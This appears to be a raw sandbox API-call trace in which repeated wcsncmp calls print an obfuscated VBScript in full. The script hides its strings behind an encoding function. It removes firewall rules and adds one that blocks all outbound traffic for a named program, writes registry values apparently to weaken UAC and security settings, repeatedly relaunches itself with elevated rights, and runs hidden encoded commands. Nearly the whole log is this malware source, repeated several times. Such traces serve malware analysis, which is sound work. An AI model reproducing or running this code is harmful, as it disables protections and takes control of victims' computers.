bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 62 [0226.324] wcsncmp (_String1=" = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.324] wcsncmp (_String1="= 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.324] wcsncmp (_String1=" 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.324] wcsncmp (_String1="0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0226.324] wcsncmp (_String1="\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = 